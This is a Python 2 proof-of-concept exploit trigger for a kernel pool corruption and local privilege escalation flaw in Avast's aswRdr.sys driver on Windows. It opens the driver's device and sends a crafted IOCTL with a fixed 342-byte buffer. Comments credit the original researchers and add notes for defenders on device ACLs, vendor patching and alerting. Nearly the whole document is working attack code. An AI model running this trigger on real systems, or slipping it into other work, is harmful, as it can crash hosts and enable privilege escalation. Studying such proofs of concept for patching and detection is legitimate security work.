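#!/usr/bin/python
#Found by AbdulAziz Hariri and Giuseppe 'Evilcry' Bonfa' (www.EvilFingers.com)
#Original advisory:
#https://www.evilfingers.com/advisory/Advisory/Avast_aswRdr_sys_Kernel_Pool_Corruption_and_Local_Privilege_Escalation.php
#
# Proof-of-concept trigger for the aswRdr.sys issue named in the advisory
# title above (kernel pool corruption / local privilege escalation).
# It opens the driver's device from user mode and issues a single
# DeviceIoControl request with fixed-size input and output buffers.
# Written for Python 2 on Windows (ctypes.windll is Windows-only).
#
# Notes for defenders and reviewers:
#   * The only precondition visible here is being able to open the device
#     for read/write. Whether a standard user can do so depends on the
#     device's ACL -- verify on the affected host.
#   * The root cause is in the driver's handling of this IOCTL, not in this
#     script; remediation is the vendor's driver update (see the advisory).
#   * Handle opens on this device by processes other than the product's own
#     components are a reasonable thing to alert on.

import sys,os
from ctypes import *

kernel32 = windll.kernel32

# Win32 CreateFile access-right and disposition constants.
GENERIC_READ = 0x80000000
GENERIC_WRITE = 0x40000000
OPEN_EXISTING = 0x3

# The NT device object is \Device\ASWRDR; user mode reaches it through the
# path below.
dev = "\\\\.\\ASWRDR"

# Control code and buffer size used by the original proof of concept.
ioctl_code = 0x80002024
current_length = 342

driver_handle = kernel32.CreateFileW(
    dev,
    GENERIC_READ | GENERIC_WRITE,
    0,
    None,
    OPEN_EXISTING,
    0,
    None,
)

# With ctypes' default int return type, INVALID_HANDLE_VALUE comes back as -1.
# The original went on to call DeviceIoControl on the bad handle and printed a
# misleading byte count; stop here instead.
if driver_handle == -1:
    sys.exit("\t[x] Could not open %s" % dev)

try:
    print("\t[x] w00t Fuzz!")

    # Input: current_length bytes of 0x3f. Output: a same-sized scratch buffer.
    in_buffer = "\x3f" * current_length
    out_buf = (c_char * current_length)()
    bytes_returned = c_ulong(current_length)

    kernel32.DeviceIoControl(
        driver_handle,
        ioctl_code,
        in_buffer,
        current_length,
        byref(out_buf),
        current_length,
        byref(bytes_returned),
        None,
    )
    print("\t[x] Bytes returned %d." % bytes_returned.value)
finally:
    # Release the device handle even if the request raises.
    kernel32.CloseHandle(driver_handle)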